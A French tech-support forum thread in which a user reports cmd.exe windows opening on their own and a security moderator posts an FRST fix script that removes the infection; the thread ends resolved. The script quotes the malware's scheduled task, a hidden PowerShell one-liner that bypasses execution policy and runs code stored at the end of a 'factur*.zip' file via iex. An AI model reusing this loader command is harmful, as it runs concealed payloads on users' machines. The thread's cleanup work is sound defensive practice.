Fenêtre cmd.exe s'ouvre toute seule [Résolu]

-
Bonjour,

Sur mon PC, la fenêtre system32.exe/cmd.exe s'ouvre souvent toute seule. J'ai lancé FRST et obtenu des rapports que voici:

FRST: https://pjjoint.malekal.com/files.php?id=FRST_20190325_k6e14e5v13s13
Addition: https://pjjoint.malekal.com/files.php?id=20190325_q13o5r11b11l8
Shortcut: https://pjjoint.malekal.com/files.php?id=20190325_g12m10b12p8z15

Quelqu'un peut-il me les "traduire" svp?

Merci d'avance,

Mathieu



Configuration: Windows / Chrome 73.0.3683.86
Afficher la suite 

2 réponses

Messages postés
20044
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
21 août 2019
5047
0
Merci
Bonjour,
Procédure à faire dans l'ordre indiqué :

1- Ouvre FRST copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
Task: {0E23E0E8-C939-482A-8681-B11C85E55C6E} - System32\Tasks\AI => C:\WINDOWS\system32\cmd.exe /c powershell -eP bypasS -win Hi"dde"n -c "&{$m=dir c:\users -r -in factur*.zip|select -last 1;$y=gc -LiteralPat $m.fullname;$y[$y.length-1]|iex}"
Task: {3C8EF72D-AF0A-40DA-9BA4-D56049B61C60} - \Microsoft\Windows\UNP\RunCampaignManager -> Pas de fichier
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Pas de fichier
FF Extension: (Pas de nom) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [non trouvé(e)]
EmptyTemp:
Reboot:
End::

2- Une fois le script copié revient dans FRST clique sur Corriger FRST va prendre automatiquement le script dans le presse papier et l'exécuter.
Laisse la correction se faire une fois qu'elle est terminée redémarre ton ordinateur.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- Vérifie et dis-moi si ton problème est toujours présent.
Commenter la réponse de bazfile
0
Merci
Merci beaucoup!
Voici le lien généré: https://pjjoint.malekal.com/files.php?id=20190327_p13f11w13h5l6

Jusqu'ici, pas de réouverture de la fenêtre, ça semble corrigé.

Encore merci!
bazfile
Messages postés
20044
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
21 août 2019
5047 -
Pour moi c'est bon, vu que pour toi aussi, je met le sujet en résolu.
Bonne journée.
Commenter la réponse de Mathieu